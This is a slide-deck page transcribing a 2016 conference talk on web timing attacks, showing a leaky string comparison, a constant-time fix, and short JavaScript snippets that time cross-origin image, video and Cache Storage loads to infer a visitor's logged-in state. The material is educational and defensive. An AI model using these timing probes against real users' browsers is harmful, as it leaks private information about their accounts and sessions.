Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Front-End Performance: The Dark Side @ Fronteers Spring Conference 2016

Mathias Bynens
April 01, 2016
Technology
15
56k

Front-End Performance: The Dark Side @ Fronteers Spring Conference 2016

In security-sensitive situations, performance can actually be a bug rather than a feature. This presentation covers timing attacks on the web, and demonstrates how modern performance-related web APIs can sometimes have a negative security impact.

More information: https://dev.opera.com/blog/timing-attacks/

Mathias Bynens

April 01, 2016
Tweet

More Decks by Mathias Bynens

See All by Mathias Bynens
V8 internals for JavaScript developers @ Fronteers 2018
mathiasbynens
2
410
V8 internals for JavaScript developers
mathiasbynens
1
640
What’s new in ES2018?
mathiasbynens
1
78
V8 internals for JavaScript developers
mathiasbynens
0
77
Preventing timing attacks on the web @ Fronteers Jam 2016
mathiasbynens
3
170
Front-End Performance: The Dark Side @ ColdFront Conference 2016
mathiasbynens
0
260
Hacking with Unicode in 2016
mathiasbynens
14
14k
3.14 things I didn’t know about CSS @ CSSConf.asia 2015
mathiasbynens
3
780
3.14 things I didn’t know about CSS @ CSS Day 2014
mathiasbynens
69
29k

Other Decks in Technology

See All in Technology
IoTだからこそ、サーバーレスを活用すべき3つの理由
soracom
PRO
2
290
コドモンSREにおける オブザーバビリティ改善の道のり
codmoninc
0
130
サーバーレスは死なぬ!みんなEDA(Event Driven Architecture)として使ってるでしょ?
cyberarchitect
4
1.4k
Postmanで始めるAI・機械学習プラットフォームHugging Face
nagix
1
180
ビジネス向けアプリを開発するときに知っておくべきAndroid Enterpriseの世界
imsaku
1
540
Setting up Monitoring for Kubernetes
prathamesh
0
160
ブロックエディタをゴリゴリに使い倒してサイトを作った話 / Kansai WordPress Meetup 2023 09 23
torounit
11
5.5k
Goで実装された高速な
仮想待合室サーバの実装と詳解
pyama86
13
5.6k
著作権とは何か?〜初歩的概念から権利利用法、侵害要件まで
line_developers
PRO
5
850
生成AIと著作権 〜生成AIによって生じる著作権関連の課題と対処
line_developers
PRO
2
640
サーバーレスアーキテクチャを使って、小さく作って大きくする取り組み
daikimori
0
420
LLM×Cloud Runでオンライン薬局の既存オペレーションを自動化した話
pharma_x_tech
0
250

Featured

See All Featured
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
226
16k
Building Effective Engineering Teams - LeadDev
addyosmani
20
940
Intergalactic Javascript Robots from Outer Space
tanoku
263
26k
Stop Working from a Prison Cell
hatefulcrawdad
265
18k
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
marktimemedia
16
1.4k
Fontdeck: Realign not Redesign
paulrobertlloyd
74
4.6k
Testing 201, or: Great Expectations
jmmastey
26
6k
Scaling GitHub
holman
455
140k
4 Signs Your Business is Dying
shpigford
172
21k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
36
22k
Large-scale JavaScript Application Architecture
addyosmani
501
110k
Pencils Down: Stop Designing & Start Developing
hursman
115
10k

Transcript

  1. @mathias
    THE DARK SIDE
    FRONT-END PERFORMANCE

    View Slide

  2. @mathias
    function compare(a, b) {
    return a === b;
    }
    compare('Fronteers', 'Fronteers');
    // → true @ 1000 μs
    compare('Fronteers', 'Fronteerz');
    // → false @ 1000 μs
    compare('Spring', 'Thing');
    // → false @ 100 μs
    compare('Spring', 'Zpring');
    // → false @ 200 μs

    View Slide

  3. @mathias
    function compare(a, b) {
    return a === b;
    }
    compare('Fronteers', 'Fronteers');
    // → true @ 1000 μs
    compare('Fronteers', 'Fronteerz');
    // → false @ 1000 μs
    compare('Spring', 'Thing');
    // → false @ 100 μs
    compare('CSS', 'XSS');
    // → false @ 200 μs

    View Slide

  4. @mathias
    function compare(a, b) {
    return a === b;
    }
    compare('Fronteers', 'Fronteers');
    // → true @ 1000 μs
    compare('Fronteers', 'Fronteerz');
    // → false @ 1000 μs
    compare('Spring', 'Thing');
    // → false @ 100 μs
    compare('CSS', 'XSS');
    // → false @ 200 μs

    View Slide

  5. @mathias
    function compare(a, b) {
    const lengthA = a.length;
    if (lengthA !== b.length) {
    return false; // performance optimization #1
    }
    for (let index = 0; index < lengthA; index++) {
    if (a.charCodeAt(index) !== b.charCodeAt(index)) {
    return false; // performance optimization #2
    }
    }
    return true; // worst-case perf scenario
    }

    View Slide

  6. @mathias
    compare('Fronteers', 'Fronteers');
    // → true @ 1000 μs
    compare('Fronteers', 'Fronteerz');
    // → false @ 1000 μs [opt. #2]
    compare('Spring', 'Thing');
    // → false @ 100 μs [opt. #1]
    compare('CSS', 'XSS');
    // → false @ 200 μs [opt. #2]

    View Slide

  7. @mathias
    SIDE-CHANNEL LEAK

    View Slide

  8. @mathias
    TIMING ATTACK

    View Slide

  9. @mathias
    compare($userInput, $secret);

    View Slide

  10. @mathias
    function compare(a, b) {
    const lengthA = a.length;
    if (lengthA !== b.length) {
    return false; // performance optimization #1
    // allows attackers to figure out expected length
    }
    for (let index = 0; index < lengthA; index++) {
    if (a.charCodeAt(index) !== b.charCodeAt(index)) {
    return false; // performance optimization #2
    // allows attackers to figure out expected
    // characters, one by one (except the last one)
    }
    }
    return true; // worst-case perf scenario
    }

    View Slide

  11. @mathias
    function safeCompare(a, b) {
    const lengthA = a.length;
    let result = 0;
    if (lengthA !== b.length) {
    b = a;
    result = 1;
    }
    for (let index = 0; index < lengthA; index++) {
    result |= (
    a.charCodeAt(index) ^ b.charCodeAt(index)
    ); // XOR
    }
    return result === 0;
    }

    View Slide

  12. @mathias
    const image = new Image();
    image.onerror = stopTimer;
    const end = performance.now();
    const delta = end - start;
    alert(`Loading took ${ delta } milliseconds.`);
    };
    startTimer();
    image.src = 'https://example.com/admin.php';

    View Slide

  13. @mathias
    const image = new Image();
    image.onerror = function() {
    const end = performance.now();
    const delta = end - start;
    alert(`Loading took ${ delta } milliseconds.`);
    };
    const start = performance.now();
    image.src = 'https://example.com/admin.php';

    View Slide

  14. @mathias

    View Slide

  15. @mathias
    750 ms

    View Slide

  16. @mathias

    View Slide

  17. @mathias
    1250 ms

    View Slide

  18. @mathias
    const image = new Image();
    image.onerror = function() {
    const end = performance.now();
    const delta = end - start;
    alert(`Loading took ${ delta } milliseconds.`);
    };
    const start = performance.now();
    image.src = 'https://example.com/admin.php';

    View Slide

  19. @mathias
    MODERN TIMING ATTACKS

    View Slide

  20. @mathias
    SNIFFLY
    OMG @BCRYPT R0CKX!!1

    View Slide

  21. @mathias

    View Slide

  22. @mathias
    VIDEO PARSING ⏱ ATTACK
    @TOMVANGOETHEM

    View Slide

  23. @mathias
    const video = document.createElement('video');
    // `suspend` event == download complete
    video.onsuspend = startTimer;
    // `error` event == parsing complete
    video.onerror = stopTimer;
    video.src = 'https://example.com/admin.php';

    View Slide

  24. @mathias
    CACHE STORAGE ⏱ ATTACK
    @TOMVANGOETHEM

    View Slide

  25. @mathias
    const url = 'https://example.com/admin.php';
    const dummyRequest = new Request('dummy');
    fetch(url, {
    'credentials': 'include',
    'mode': 'no-cors'
    }).then(function(response) {
    // The download has completed.
    startTimer();
    return cache.put(dummyRequest, response.clone());
    }).then(function() {
    // The resource has been stored in the cache.
    stopTimer();
    });

    View Slide

  26. @mathias

    View Slide

  27. @mathias

    View Slide

  28. @mathias

    View Slide

  29. @mathias
    30 ms

    View Slide

  30. @mathias

    View Slide

  31. @mathias
    15 ms

    View Slide

  32. @mathias

    View Slide

  33. @mathias

    View Slide

  34. @mathias

    View Slide

  35. @mathias
    "

    View Slide

  36. @mathias
    THANKS!
    Sniffly by @bcrypt: https://mths.be/buy
    Research by @tomvangoethem: https://mths.be/buz
    Bonus — examples by @sirdarckcat: https://mths.be/bva

    View Slide